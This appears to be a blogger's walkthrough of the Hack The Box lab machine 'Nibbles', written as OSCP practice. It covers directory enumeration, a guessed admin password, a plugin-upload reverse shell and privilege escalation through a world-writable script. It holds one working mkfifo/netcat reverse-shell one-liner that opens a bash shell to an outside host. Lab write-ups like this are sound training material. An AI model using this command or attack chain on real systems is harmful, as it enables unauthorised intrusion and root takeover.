Another day, another box. This one is Nibbles from HTB. A fairly straightforward exploitation that reinforces some good enumeration habits.
In an acorn, we find a webpage with nothing going on. A review of the source code reveals a directory that we can gobuster. We find an admin panel and use some CTF-FU to get it in. Once we’re in, we need to actiave a plugin that allows us to upload a reverse shell. For privesc we find a world writable script and use it to gain root.
As for the OSCP what did this box teach me:
- Enumerate, enumerate and enumerate (I literally ran three gobuster scans)
- Enumerate extensions!
- Learned how world writable files are silly easy methods for privesc
Nibbles IP address is
As always a nmap scan to start off the recon:
We find two ports open:
Nothing to report on the full port scan
We travel to
10.10.10.75 and smacked with a page that tells us nothing:
A gobuster here, reveals nothing, so I decide to check the source code of this page to see if there are any indications of something and boom:
Now I rerun my gobuster scan with the new directory and hit paydirt. Directories for days!
But believe it or not, still hitting dead ends. What am I missing!? Oh yeah, extensions!
I rerun my gobuster scan now a third time with extensions and get some more insight as to what’s going on:
Now I see what I missed:
I travelled over to the page and was hit with a login screen. Now this is something I always do when I come across a login page on a CTF or machine:
The password here was admin:nibbles
Once I was here I had full administrator access so I immediately started hunting around for ways to upload files and came across this:
Now that I have version number, I can use google to hunt for previously known exploits.
Nibbles is vulnerable to image plugin upload which allowed me to upload a fancy reverse shell.
From here I clicked on image.php and popped a shell.
I apologize for the lack of pictures here, as I must have forgot to take them. But once I popped the shell I found that monitor.sh was world writable.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.7 1234 > /tmp/f
and executed it:
Fun, easy quick box! Think it’s time to up the ante and try on some tougher ones!